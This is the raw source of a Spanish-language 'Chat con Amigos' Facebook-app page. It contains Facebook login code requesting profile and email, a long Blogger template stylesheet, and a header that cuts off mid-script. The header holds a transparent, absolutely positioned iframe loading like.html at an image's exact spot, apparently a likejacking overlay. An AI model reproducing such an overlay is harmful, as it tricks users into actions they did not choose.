//welcomeBlock.innerHTML = 'Hello, ' + data.first_name + '!';\r\n\t\t\t});\r\n\t\t  }\r\n\t\t}\r\n\r\n\r\n\r\n\r\n  FB.getLoginStatus(function(response) {\r\n    \t  // Check login status on load, and if the user is\r\n\t\t  // already logged in, go directly to the welcome message.\r\n\t\t  if (response.status == 'connected') {\r\n\t\t\tgetApi();\r\n\t\t  } else {\r\n\t\t\t// Otherwise, show Login dialog first.\r\n\r\n\t\t\tFB.login(function(response) {\r\n\r\n\t\t\t   if (response.authResponse) {\r\n\t\t\t\tconsole.log('Welcome!  Fetching your information.... ');\r\n\t\t\t\ttop.location.href='https://apps.facebook.com/chatsconamigos/';\r\n\t\t\t   } else {\r\n\t\t \t\topenAlerta(\"<div style=\\\"padding:20px;line-height:23px;font-size:16px;\\\"><br><b>usa esta AplicaciÃ³n !!!</b><br><br><a href=\\\"https://apps.facebook.com/chatsconamigos\\\">Ingresar</a></b></div>\",1);\r\n\t\t\t\t//console.log('User cancelled login or did not fully authorize.');\r\n\t\t\t   }\r\n\r\n\t\t\t}, {scope: 'public_profile,email'})\r\n\t\t  }\r\n\t\t});\r\n\r\n  \r\n  };\r\n\r\n\r\n\r\n\r\nfunction login() {\r\n    FB.login(function(response) {\r\n        if (response.authResponse) {\r\n            // connected\r\n            getApi();\r\n        } else {\r\n    \t\t//alert('0');\r\n            // cancelled\r\n        }\r\n    });\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n  // Here we run a very simple test of the Graph API after login is\r\n  // successful.  See statusChangeCallback() for when this call is made.\r\n  function testAPI() {\r\n    console.log('Welcome!  Fetching your information.... ');\r\n    FB.api('/me', function(response) {\r\n      console.log('Successful login for: ' + response.name);\r\n      document.getElementById('status').innerHTML =\r\n        'Bienvenid@, ' + response.name + ' !';\r\n\r\n\r\n \r\n\r\n\r\n    });\r\n  }\r\n</script>\r\n\r\n\r\n\r\n\r\n\r\n</body>\r\n</html>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<!DOCTYPE html>\r\n<html class='v2' dir='ltr'>\r\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb18030\">\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n<link rel='image_src' href=\"https://chatconamigoss.byethost15.com/fondocom.jpg\" />\r\n        <meta property='og:image' content=\"https://chatconamigoss.byethost15.com/fondocom.jpg\" />\r\n\r\n<link rel=\" \" href=\"https://chatconamigoss.byethost15.com/\" />\r\n            <meta property=\"og:url\" content=\"https://chatconamigoss.byethost15.com/index.php\" />\r\n\r\n        <meta property='og:type' content=\"website\" />\r\n    <meta property='fb:app_id' content='1644038375825417' />\r\n\r\n<meta property=\"og:title\" content=\"website\" />\r\n\r\n    <meta property='og:site_name' content='Chat con Amigos' />\r\n    <meta name=\"title\" content=\"Chat con Amigos\" />\r\n        <meta name=\"description\" content=\"Veni y chatea con nosotros, conoce nuevos amigos\" />\r\n        <meta property=\"og:description\" content=\"Veni y chatea con nosotros, conoce nuevos amigos\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<title>Chat con Amigos</title>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n<meta content='blogger' name='generator'/>\r\n<link href='https://chatconamigoss.byethost15.com/icono.png' rel='icon' type='image/png'/>\r\n\r\n\r\n\r\n<!--[if IE]> <script> (function() { var html5 = (\"abbr,article,aside,audio,canvas,datalist,details,\" + \"figure,footer,header,hgroup,mark,menu,meter,nav,output,\" + \"progress,section,time,video\").split(','); for (var i = 0; i < html5.length; i++) { document.createElement(html5[i]); } try { document.execCommand('BackgroundImageCache', false, true); } catch(e) {} })(); </script> <![endif]-->\r\n<title>Chat con Amigos</title>\r\n<link type='text/css' rel='stylesheet' href='https://www.blogger.com/static/v1/widgets/1535467126-widget_css_2_bundle.css' />\r\n<link type='text/css' rel='stylesheet' href='https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1522353389101021789&zx=aebd042a-6e3f-4ae8-aa16-f84e894a204b' />\r\n<style id='page-skin-1' type='text/css'><!--\r\n/*\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------------------------\r\nBlogger Template Style\r\nName:     Simple\r\nDesigner: \r\nURL:      www.\r\n----------------------------------------------- */\r\n/* Variable definitions\r\n====================\r\n\r\n\r\n\r\n<Variable name=\"keycolor\" description=\"Main Color\" type=\"color\" default=\"#66bbdd\"/>\r\n<Group description=\"Page Text\" selector=\"body\">\r\n<Variable name=\"body.font\" description=\"Font\" type=\"font\"\r\ndefault=\"normal normal 12px Arial, Tahoma, Helvetica, FreeSans, sans-serif\"/>\r\n<Variable name=\"body.text.color\" description=\"Text Color\" type=\"color\" default=\"#222222\"/>\r\n</Group>\r\n<Group description=\"Backgrounds\" selector=\".body-fauxcolumns-outer\">\r\n<Variable name=\"body.background.color\" description=\"Outer Background\" type=\"color\" default=\"#66bbdd\"/>\r\n<Variable name=\"content.background.color\" description=\"Main Background\" type=\"color\" default=\"#ffffff\"/>\r\n<Variable name=\"header.background.color\" description=\"Header Background\" type=\"color\" default=\"transparent\"/>\r\n</Group>\r\n<Group description=\"Links\" selector=\".main-outer\">\r\n<Variable name=\"link.color\" description=\"Link Color\" type=\"color\" default=\"#2288bb\"/>\r\n<Variable name=\"link.visited.color\" description=\"Visited Color\" type=\"color\" default=\"#888888\"/>\r\n<Variable name=\"link.hover.color\" description=\"Hover Color\" type=\"color\" default=\"#33aaff\"/>\r\n</Group>\r\n<Group description=\"Blog Title\" selector=\".header h1\">\r\n<Variable name=\"header.font\" description=\"Font\" type=\"font\"\r\ndefault=\"normal normal 60px Arial, Tahoma, Helvetica, FreeSans, sans-serif\"/>\r\n<Variable name=\"header.text.color\" description=\"Title Color\" type=\"color\" default=\"#3399bb\" />\r\n</Group>\r\n<Group description=\"Blog Description\" selector=\".header .description\">\r\n<Variable name=\"description.text.color\" description=\"Description Color\" type=\"color\"\r\ndefault=\"#777777\" />\r\n</Group>\r\n<Group description=\"Tabs Text\" selector=\".tabs-inner .widget li a\">\r\n<Variable name=\"tabs.font\" description=\"Font\" type=\"font\"\r\ndefault=\"normal normal 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif\"/>\r\n<Variable name=\"tabs.text.color\" description=\"Text Color\" type=\"color\" default=\"#999999\"/>\r\n<Variable name=\"tabs.selected.text.color\" description=\"Selected Color\" type=\"color\" default=\"#000000\"/>\r\n</Group>\r\n<Group description=\"Tabs Background\" selector=\".tabs-outer .PageList\">\r\n<Variable name=\"tabs.background.color\" description=\"Background Color\" type=\"color\" default=\"#f5f5f5\"/>\r\n<Variable name=\"tabs.selected.background.color\" description=\"Selected Color\" type=\"color\" default=\"#eeeeee\"/>\r\n</Group>\r\n<Group description=\"Post Title\" selector=\"h3.post-title, .comments h4\">\r\n<Variable name=\"post.title.font\" description=\"Font\" type=\"font\"\r\ndefault=\"normal normal 22px Arial, Tahoma, Helvetica, FreeSans, sans-serif\"/>\r\n</Group>\r\n<Group description=\"Date Header\" selector=\".date-header\">\r\n<Variable name=\"date.header.color\" description=\"Text Color\" type=\"color\"\r\ndefault=\"#222222\"/>\r\n<Variable name=\"date.header.background.color\" description=\"Background Color\" type=\"color\"\r\ndefault=\"transparent\"/>\r\n</Group>\r\n<Group description=\"Post Footer\" selector=\".post-footer\">\r\n<Variable name=\"post.footer.text.color\" description=\"Text Color\" type=\"color\" default=\"#666666\"/>\r\n<Variable name=\"post.footer.background.color\" description=\"Background Color\" type=\"color\"\r\ndefault=\"#f9f9f9\"/>\r\n<Variable name=\"post.footer.border.color\" description=\"Shadow Color\" type=\"color\" default=\"#eeeeee\"/>\r\n</Group>\r\n<Group description=\"Gadgets\" selector=\"h2\">\r\n<Variable name=\"widget.title.font\" description=\"Title Font\" type=\"font\"\r\ndefault=\"normal bold 11px Arial, Tahoma, Helvetica, FreeSans, sans-serif\"/>\r\n<Variable name=\"widget.title.text.color\" description=\"Title Color\" type=\"color\" default=\"#000000\"/>\r\n<Variable name=\"widget.alternate.text.color\" description=\"Alternate Color\" type=\"color\" default=\"#999999\"/>\r\n</Group>\r\n<Group description=\"Images\" selector=\".main-inner\">\r\n<Variable name=\"image.background.color\" description=\"Background Color\" type=\"color\" default=\"#ffffff\"/>\r\n<Variable name=\"image.border.color\" description=\"Border Color\" type=\"color\" default=\"#eeeeee\"/>\r\n<Variable name=\"image.text.color\" description=\"Caption Text Color\" type=\"color\" default=\"#222222\"/>\r\n</Group>\r\n<Group description=\"Accents\" selector=\".content-inner\">\r\n<Variable name=\"body.rule.color\" description=\"Separator Line Color\" type=\"color\" default=\"#eeeeee\"/>\r\n<Variable name=\"tabs.border.color\" description=\"Tabs Border Color\" type=\"color\" default=\"#eeeeee\"/>\r\n</Group>\r\n<Variable name=\"body.background\" description=\"Body Background\" type=\"background\"\r\ncolor=\"#eeaa00\" default=\"$(color) none repeat scroll top left\"/>\r\n<Variable name=\"body.background.override\" description=\"Body Background Override\" type=\"string\" default=\"\"/>\r\n<Variable name=\"body.background.gradient.cap\" description=\"Body Gradient Cap\" type=\"url\"\r\ndefault=\"url(//www.blogblog.com/1kt/simple/gradients_light.png)\"/>\r\n<Variable name=\"body.background.gradient.tile\" description=\"Body Gradient Tile\" type=\"url\"\r\ndefault=\"url(//www.blogblog.com/1kt/simple/body_gradient_tile_light.png)\"/>\r\n<Variable name=\"content.background.color.selector\" description=\"Content Background Color Selector\" type=\"string\" default=\".content-inner\"/>\r\n<Variable name=\"content.padding\" description=\"Content Padding\" type=\"length\" default=\"10px\"/>\r\n<Variable name=\"content.padding.horizontal\" description=\"Content Horizontal Padding\" type=\"length\" default=\"10px\"/>\r\n<Variable name=\"content.shadow.spread\" description=\"Content Shadow Spread\" type=\"length\" default=\"40px\"/>\r\n<Variable name=\"content.shadow.spread.webkit\" description=\"Content Shadow Spread (WebKit)\" type=\"length\" default=\"5px\"/>\r\n<Variable name=\"content.shadow.spread.ie\" description=\"Content Shadow Spread (IE)\" type=\"length\" default=\"10px\"/>\r\n<Variable name=\"main.border.width\" description=\"Main Border Width\" type=\"length\" default=\"0\"/>\r\n<Variable name=\"header.background.gradient\" description=\"Header Gradient\" type=\"url\" default=\"none\"/>\r\n<Variable name=\"header.shadow.offset.left\" description=\"Header Shadow Offset Left\" type=\"length\" default=\"-1px\"/>\r\n<Variable name=\"header.shadow.offset.top\" description=\"Header Shadow Offset Top\" type=\"length\" default=\"-1px\"/>\r\n<Variable name=\"header.shadow.spread\" description=\"Header Shadow Spread\" type=\"length\" default=\"1px\"/>\r\n<Variable name=\"header.padding\" description=\"Header Padding\" type=\"length\" default=\"30px\"/>\r\n<Variable name=\"header.border.size\" description=\"Header Border Size\" type=\"length\" default=\"1px\"/>\r\n<Variable name=\"header.bottom.border.size\" description=\"Header Bottom Border Size\" type=\"length\" default=\"0\"/>\r\n<Variable name=\"header.border.horizontalsize\" description=\"Header Horizontal Border Size\" type=\"length\" default=\"0\"/>\r\n<Variable name=\"description.text.size\" description=\"Description Text Size\" type=\"string\" default=\"140%\"/>\r\n<Variable name=\"tabs.margin.top\" description=\"Tabs Margin Top\" type=\"length\" default=\"0\" />\r\n<Variable name=\"tabs.margin.side\" description=\"Tabs Side Margin\" type=\"length\" default=\"30px\" />\r\n<Variable name=\"tabs.background.gradient\" description=\"Tabs Background Gradient\" type=\"url\"\r\ndefault=\"url(//www.blogblog.com/1kt/simple/gradients_light.png)\"/>\r\n<Variable name=\"tabs.border.width\" description=\"Tabs Border Width\" type=\"length\" default=\"1px\"/>\r\n<Variable name=\"tabs.bevel.border.width\" description=\"Tabs Bevel Border Width\" type=\"length\" default=\"1px\"/>\r\n<Variable name=\"date.header.padding\" description=\"Date Header Padding\" type=\"string\" default=\"inherit\"/>\r\n<Variable name=\"date.header.letterspacing\" description=\"Date Header Letter Spacing\" type=\"string\" default=\"inherit\"/>\r\n<Variable name=\"date.header.margin\" description=\"Date Header Margin\" type=\"string\" default=\"inherit\"/>\r\n<Variable name=\"post.margin.bottom\" description=\"Post Bottom Margin\" type=\"length\" default=\"25px\"/>\r\n<Variable name=\"image.border.small.size\" description=\"Image Border Small Size\" type=\"length\" default=\"2px\"/>\r\n<Variable name=\"image.border.large.size\" description=\"Image Border Large Size\" type=\"length\" default=\"5px\"/>\r\n<Variable name=\"page.width.selector\" description=\"Page Width Selector\" type=\"string\" default=\".region-inner\"/>\r\n<Variable name=\"page.width\" description=\"Page Width\" type=\"string\" default=\"auto\"/>\r\n<Variable name=\"main.section.margin\" description=\"Main Section Margin\" type=\"length\" default=\"15px\"/>\r\n<Variable name=\"main.padding\" description=\"Main Padding\" type=\"length\" default=\"15px\"/>\r\n<Variable name=\"main.padding.top\" description=\"Main Padding Top\" type=\"length\" default=\"30px\"/>\r\n<Variable name=\"main.padding.bottom\" description=\"Main Padding Bottom\" type=\"length\" default=\"30px\"/>\r\n<Variable name=\"paging.background\"\r\ncolor=\"#ffffff\"\r\ndescription=\"Background of blog paging area\" type=\"background\"\r\ndefault=\"transparent none no-repeat scroll top center\"/>\r\n<Variable name=\"footer.bevel\" description=\"Bevel border length of footer\" type=\"length\" default=\"0\"/>\r\n<Variable name=\"mobile.background.overlay\" description=\"Mobile Background Overlay\" type=\"string\"\r\ndefault=\"transparent none repeat scroll top left\"/>\r\n<Variable name=\"mobile.background.size\" description=\"Mobile Background Size\" type=\"string\" default=\"auto\"/>\r\n<Variable name=\"mobile.button.color\" description=\"Mobile Button Color\" type=\"color\" default=\"#ffffff\" />\r\n<Variable name=\"startSide\" description=\"Side where text starts in blog language\" type=\"automatic\" default=\"left\"/>\r\n<Variable name=\"endSide\" description=\"Side where text ends in blog language\" type=\"automatic\" default=\"right\"/>\r\n*/\r\n/* Content\r\n----------------------------------------------- */\r\nbody {\r\nfont: normal normal 12px Arial, Tahoma, Helvetica, FreeSans, sans-serif;\r\ncolor: #222222;\r\nbackground: #8FE8FF none repeat scroll top left;\r\npadding: 0 40px 40px 40px;\r\n}\r\nhtml body .region-inner {\r\nmin-width: 0;\r\nmax-width: 100%;\r\nwidth: auto;\r\n}\r\na:link {\r\ntext-decoration:none;\r\ncolor: #cc6611;\r\n}\r\na:visited {\r\ntext-decoration:none;\r\ncolor: #888888;\r\n}\r\na:hover {\r\ntext-decoration:underline;\r\ncolor: #ff9900;\r\n}\r\n\r\n\r\n.body-fauxcolumn-outer .fauxcolumn-inner {\r\nbackground-image: url('https://chatconamigoss.byethost15.com/back.jpg');\r\nbackground-repeat: no-repeat;\r\nbackground-attachment: fixed\r\n}\r\n\r\n\r\n.body-fauxcolumn-outer .cap-top {\r\nposition: absolute;\r\nz-index: 1;\r\nheight: 400px;\r\nwidth: 100%;\r\nbackground: #8FE8FF none repeat scroll top left;\r\n}\r\n\r\n\r\n.body-fauxcolumn-outer .cap-top .cap-left {\r\nwidth: 100%;\r\nbackground-image: url('https://chatconamigoss.byethost15.com/back.jpg');\r\nbackground-repeat: no-repeat;\r\nbackground-attachment: fixed\r\n}\r\n\r\n\r\n.content-outer {\r\n-moz-box-shadow: 0 0 40px rgba(0, 0, 0, .15);\r\n-webkit-box-shadow: 0 0 5px rgba(0, 0, 0, .15);\r\n-goog-ms-box-shadow: 0 0 10px #333333;\r\nbox-shadow: 0 0 40px rgba(0, 0, 0, .15);\r\nmargin-bottom: 1px;\r\n}\r\n.content-inner {\r\npadding: 10px 10px;\r\n}\r\n.content-inner {\r\nbackground-color: #ffffff;\r\n}\r\n/* Header\r\n----------------------------------------------- */\r\n\r\n\r\n.header-outer {\r\nbackground-image: url('https://chatconamigoss.byethost15.com/fondof.jpg');\r\nbackground-repeat: no-repeat;\r\nbackground-attachment: \r\n}\r\n\r\n\r\n.Header h1 {\r\nfont: normal normal 60px Arial, Tahoma, Helvetica, FreeSans, sans-serif;\r\ncolor: #ffffff;\r\ntext-shadow: 1px 2px 3px rgba(0, 0, 0, .2);\r\n}\r\n.Header h1 a {\r\ncolor: #ffffff;\r\n}\r\n.Header .description {\r\nfont-size: 140%;\r\ncolor: #ffffff;\r\n}\r\n.header-inner .Header .titlewrapper {\r\npadding: 62px 30px;\r\n}\r\n.header-inner .Header .descriptionwrapper {\r\npadding: 0 30px;\r\n}\r\n/* Tabs\r\n----------------------------------------------- */\r\n.tabs-inner .section:first-child {\r\nborder-top: 0 solid #eeeeee;\r\n}\r\n.tabs-inner .section:first-child ul {\r\nmargin-top: -0;\r\nborder-top: 0 solid #eeeeee;\r\nborder-left: 0 solid #eeeeee;\r\nborder-right: 0 solid #eeeeee;\r\n}\r\n.tabs-inner .widget ul {\r\nbackground: #F0FD9E url(https://www.blogblog.com/1kt/simple/gradients_light.png) repeat-x scroll 0 -800px;\r\n_background-image: none;\r\nborder-bottom: 1px solid #eeeeee;\r\nmargin-top: 0;\r\nmargin-left: -30px;\r\nmargin-right: -30px;\r\n}\r\n.tabs-inner .widget li a {\r\ndisplay: inline-block;\r\npadding: .6em 1.0156em;\r\nfont: normal normal 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif;\r\ncolor: #999999;\r\nborder-left: 1px solid #ffffff;\r\nborder-right: 1px solid #eeeeee;\r\n}\r\n.tabs-inner .widget li:first-child a {\r\nborder-left: none;\r\n}\r\n.tabs-inner .widget li.selected a, .tabs-inner .widget li a:hover {\r\ncolor: #000000;\r\nbackground-color: #B1FFCB;\r\ntext-decoration: none;\r\n}\r\n/* Columns\r\n----------------------------------------------- */\r\n.main-outer {\r\nborder-top: 0 solid #eeeeee;\r\n}\r\n.fauxcolumn-left-outer .fauxcolumn-inner {\r\nborder-right: 1px solid #eeeeee;\r\n}\r\n.fauxcolumn-right-outer .fauxcolumn-inner {\r\nborder-left: 1px solid #eeeeee;\r\n}\r\n/* Headings\r\n----------------------------------------------- */\r\nh2 {\r\nmargin: 0 0 1em 0;\r\nfont: normal bold 11px Arial, Tahoma, Helvetica, FreeSans, sans-serif;\r\ncolor: #000000;\r\n}\r\n/* Widgets\r\n----------------------------------------------- */\r\n.widget .zippy {\r\ncolor: #999999;\r\ntext-shadow: 2px 2px 1px rgba(0, 0, 0, .1);\r\n}\r\n.widget .popular-posts ul {\r\nlist-style: none;\r\n}\r\n/* Posts\r\n----------------------------------------------- */\r\n.date-header span {\r\nbackground-color: transparent;\r\ncolor: #222222;\r\npadding: inherit;\r\nletter-spacing: inherit;\r\nmargin: inherit;\r\n}\r\n.main-inner {\r\npadding-top: 30px;\r\npadding-bottom: 30px;\r\n}\r\n.main-inner .column-center-inner {\r\npadding: 0 15px;\r\n}\r\n.main-inner .column-center-inner .section {\r\nmargin: 0 15px;\r\n}\r\n.post {\r\nmargin: 0 0 25px 0;\r\n}\r\nh3.post-title, .comments h4 {\r\nfont: normal normal 22px Arial, Tahoma, Helvetica, FreeSans, sans-serif;\r\nmargin: .75em 0 0;\r\n}\r\n.post-body {\r\nfont-size: 110%;\r\nline-height: 1.4;\r\nposition: relative;\r\n}\r\n.post-body img, .post-body .tr-caption-container, .Profile img, .Image img,\r\n.BlogList .item-thumbnail img {\r\npadding: 2px;\r\nbackground: #ffffff;\r\nborder: 1px solid #eeeeee;\r\n-moz-box-shadow: 1px 1px 5px rgba(0, 0, 0, .1);\r\n-webkit-box-shadow: 1px 1px 5px rgba(0, 0, 0, .1);\r\nbox-shadow: 1px 1px 5px rgba(0, 0, 0, .1);\r\n}\r\n.post-body img, .post-body .tr-caption-container {\r\npadding: 5px;\r\n}\r\n.post-body .tr-caption-container {\r\ncolor: #222222;\r\n}\r\n.post-body .tr-caption-container img {\r\npadding: 0;\r\nbackground: transparent;\r\nborder: none;\r\n-moz-box-shadow: 0 0 0 rgba(0, 0, 0, .1);\r\n-webkit-box-shadow: 0 0 0 rgba(0, 0, 0, .1);\r\nbox-shadow: 0 0 0 rgba(0, 0, 0, .1);\r\n}\r\n.post-header {\r\nmargin: 0 0 1.5em;\r\nline-height: 1.6;\r\nfont-size: 90%;\r\n}\r\n.post-footer {\r\nmargin: 20px -2px 0;\r\npadding: 5px 10px;\r\ncolor: #666666;\r\nbackground-color: #f9f9f9;\r\nborder-bottom: 1px solid #eeeeee;\r\nline-height: 1.6;\r\nfont-size: 90%;\r\n}\r\n#comments .comment-author {\r\npadding-top: 1.5em;\r\nborder-top: 1px solid #eeeeee;\r\nbackground-position: 0 1.5em;\r\n}\r\n#comments .comment-author:first-child {\r\npadding-top: 0;\r\nborder-top: none;\r\n}\r\n.avatar-image-container {\r\nmargin: .2em 0 0;\r\n}\r\n#comments .avatar-image-container img {\r\nborder: 1px solid #eeeeee;\r\n}\r\n/* Comments\r\n----------------------------------------------- */\r\n.comments .comments-content .icon.blog-author {\r\nbackground-repeat: no-repeat;\r\nbackground-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABIAAAASCAYAAABWzo5XAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEgAACxIB0t1+/AAAAAd0SU1FB9sLFwMeCjjhcOMAAAD+SURBVDjLtZSvTgNBEIe/WRRnm3U8RC1neQdsm1zSBIU9VVF1FkUguQQsD9ITmD7ECZIJSE4OZo9stoVjC/zc7ky+zH9hXwVwDpTAWWLrgS3QAe8AZgaAJI5zYAmc8r0G4AHYHQKVwII8PZrZFsBFkeRCABYiMh9BRUhnSkPTNCtVXYXURi1FpBDgArj8QU1eVXUzfnjv7yP7kwu1mYrkWlU33vs1QNu2qU8pwN0UpKoqokjWwCztrMuBhEhmh8bD5UDqur75asbcX0BGUB9/HAMB+r32hznJgXy2v0sGLBcyAJ1EK3LFcbo1s91JeLwAbwGYu7TP/3ZGfnXYPgAVNngtqatUNgAAAABJRU5ErkJggg==);\r\n}\r\n.comments .comments-content .loadmore a {\r\nborder-top: 1px solid #999999;\r\nborder-bottom: 1px solid #999999;\r\n}\r\n.comments .comment-thread.inline-thread {\r\nbackground-color: #f9f9f9;\r\n}\r\n.comments .continue {\r\nborder-top: 2px solid #999999;\r\n}\r\n/* Accents\r\n---------------------------------------------- */\r\n.section-columns td.columns-cell {\r\nborder-left: 1px solid #eeeeee;\r\n}\r\n.blog-pager {\r\nbackground: transparent none no-repeat scroll top center;\r\n}\r\n.blog-pager-older-link, .home-link,\r\n.blog-pager-newer-link {\r\nbackground-color: #ffffff;\r\npadding: 5px;\r\n}\r\n.footer-outer {\r\nborder-top: 0 dashed #bbbbbb;\r\n}\r\n/* Mobile\r\n----------------------------------------------- */\r\nbody.mobile  {\r\nbackground-size: auto;\r\n}\r\n.mobile .body-fauxcolumn-outer {\r\nbackground: transparent none repeat scroll top left;\r\n}\r\n.mobile .body-fauxcolumn-outer .cap-top {\r\nbackground-size: 100% auto;\r\n}\r\n.mobile .content-outer {\r\n-webkit-box-shadow: 0 0 3px rgba(0, 0, 0, .15);\r\nbox-shadow: 0 0 3px rgba(0, 0, 0, .15);\r\n}\r\nbody.mobile .AdSense {\r\nmargin: 0 -40px;\r\n}\r\n.mobile .tabs-inner .widget ul {\r\nmargin-left: 0;\r\nmargin-right: 0;\r\n}\r\n.mobile .post {\r\nmargin: 0;\r\n}\r\n.mobile .main-inner .column-center-inner .section {\r\nmargin: 0;\r\n}\r\n.mobile .date-header span {\r\npadding: 0.1em 10px;\r\nmargin: 0 -10px;\r\n}\r\n.mobile h3.post-title {\r\nmargin: 0;\r\n}\r\n.mobile .blog-pager {\r\nbackground: transparent none no-repeat scroll top center;\r\n}\r\n.mobile .footer-outer {\r\nborder-top: none;\r\n}\r\n.mobile .main-inner, .mobile .footer-inner {\r\nbackground-color: #ffffff;\r\n}\r\n.mobile-index-contents {\r\ncolor: #222222;\r\n}\r\n.mobile-link-button {\r\nbackground-color: #cc6611;\r\n}\r\n.mobile-link-button a:link, .mobile-link-button a:visited {\r\ncolor: #ffffff;\r\n}\r\n.mobile .tabs-inner .section:first-child {\r\nborder-top: none;\r\n}\r\n.mobile .tabs-inner .PageList .widget-content {\r\nbackground-color: #eeeeee;\r\ncolor: #000000;\r\nborder-top: 1px solid #eeeeee;\r\nborder-bottom: 1px solid #eeeeee;\r\n}\r\n.mobile .tabs-inner .PageList .widget-content .pagelist-arrow {\r\nborder-left: 1px solid #eeeeee;\r\n}\r\n\r\n--></style>\r\n<style id='template-skin-1' type='text/css'><!--\r\nbody {\r\nmin-width: 960px;\r\n}\r\n.content-outer, .content-fauxcolumn-outer, .region-inner {\r\nmin-width: 960px;\r\nmax-width: 960px;\r\n_width: 960px;\r\n}\r\n.main-inner .columns {\r\npadding-left: 0;\r\npadding-right: 310px;\r\n}\r\n.main-inner .fauxcolumn-center-outer {\r\nleft: 0;\r\nright: 310px;\r\n/* IE6 does not respect left and right together */\r\n_width: expression(this.parentNode.offsetWidth -\r\nparseInt(\"0\") -\r\nparseInt(\"310px\") + 'px');\r\n}\r\n.main-inner .fauxcolumn-left-outer {\r\nwidth: 0;\r\n}\r\n.main-inner .fauxcolumn-right-outer {\r\nwidth: 310px;\r\n}\r\n.main-inner .column-left-outer {\r\nwidth: 0;\r\nright: 100%;\r\nmargin-left: -0;\r\n}\r\n.main-inner .column-right-outer {\r\nwidth: 310px;\r\nmargin-right: -310px;\r\n}\r\n#layout {\r\nmin-width: 0;\r\n}\r\n#layout .content-outer {\r\nmin-width: 0;\r\nwidth: 800px;\r\n}\r\n#layout .region-inner {\r\nmin-width: 0;\r\nwidth: auto;\r\n}\r\n--></style>\r\n<script type=\"text/javascript\">var a=\"indexOf\",b=\"&m=1\",e=\"(^|&)m=\",f=\"?\",g=\"?m=1\";function h(){var c=window.location.href,d=c.split(f);switch(d.length){case 1:return c+g;case 2:return 0<=d[1].search(e)?null:c+b;default:return null}}var k=navigator.userAgent;if(-1!=k[a](\"Mobile\")&&-1!=k[a](\"WebKit\")&&-1==k[a](\"iPad\")||-1!=k[a](\"Opera Mini\")||-1!=k[a](\"IEMobile\")){var l=h();l&&window.location.replace(l)};\r\n</script><script type=\"text/javascript\">\r\nif (window.jstiming) window.jstiming.load.tick('headEnd');\r\n</script></head>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<body class='loading variant-bold'>\r\n<div class='navbar section' id='navbar'>\r\n</div>\r\n<div class='body-fauxcolumns'>\r\n<div class='fauxcolumn-outer body-fauxcolumn-outer'>\r\n<div class='cap-top'>\r\n<div class='cap-left'></div>\r\n<div class='cap-right'></div>\r\n</div>\r\n<div class='fauxborder-left'>\r\n<div class='fauxborder-right'></div>\r\n<div class='fauxcolumn-inner'>\r\n</div>\r\n</div>\r\n<div class='cap-bottom'>\r\n<div class='cap-left'></div>\r\n<div class='cap-right'></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class='content'>\r\n<div class='content-fauxcolumns'>\r\n<div class='fauxcolumn-outer content-fauxcolumn-outer'>\r\n<div class='cap-top'>\r\n<div class='cap-left'></div>\r\n<div class='cap-right'></div>\r\n</div>\r\n<div class='fauxborder-left'>\r\n<div class='fauxborder-right'></div>\r\n<div class='fauxcolumn-inner'>\r\n</div>\r\n</div>\r\n<div class='cap-bottom'>\r\n<div class='cap-left'></div>\r\n<div class='cap-right'></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class='content-outer'>\r\n<div class='content-cap-top cap-top'>\r\n<div class='cap-left'></div>\r\n<div class='cap-right'></div>\r\n</div>\r\n<div class='fauxborder-left content-fauxborder-left'>\r\n<div class='fauxborder-right content-fauxborder-right'></div>\r\n<div class='content-inner'>\r\n<header>\r\n<div class='header-outer'>\r\n<div class='header-cap-top cap-top'>\r\n<div class='cap-left'></div>\r\n<div class='cap-right'></div>\r\n</div>\r\n\r\n\r\n\r\n<div class='fauxborder-left header-fauxborder-left'>\r\n<div class='fauxborder-right header-fauxborder-right'></div>\r\n<div class='region-inner header-inner'>\r\n<div class='header section' id='header'><div class='widget Header' id='Header1'>\r\n\r\n\r\n\r\n<iframe width=939\" height=\"570\" src=\" \" frameborder=\"0\" allowfullscreen scrolling=\"no\"></iframe>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<DIV STYLE=\" position:absolute; top:33px; left:280px; width:440px; height:20px; visibility:visible z-index:3\"> \r\n<img src=\"https://chatconamigoss.byethost15.com/logo.png\" width=\"385\" height=\"22\" alt=\"CHAT CON AMIGOS\" />\r\n\r\n\r\n\r\n         \r\n\r\n\r\n\r\n \r\n<div style=\"position: absolute; left: 490px; top: 420px; z-index: 10; width:22px; height:20px;\"> <IMG SRC=\"https://chatconamigoss.byethost15.com/pto.png\" border=0> </div>\r\n\r\n\r\n<iframe width=\"0\" height=\"0\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\"  allowtransparency=\"true\" div style=\"border:0px solid #0058f0; position: absolute; left: 490px;  top:420px; z-index: 9; width:79px; height:20px;\" src=\"https://chatconamigoss.byethost15.com/like.html\"></iframe>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<div id='header-inner'>\r\n<div class='titlewrapper'>\r\n<h1 class='title'>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<div id=\"fb-root\"></div>\r\n<script>(function(d, s, id) {\r\n  var js, fjs = d.getElementsByTagName(s)[0];\r\n  if (d.getElementById(id)) return;\r\n  js = d.createElement(s); js.id 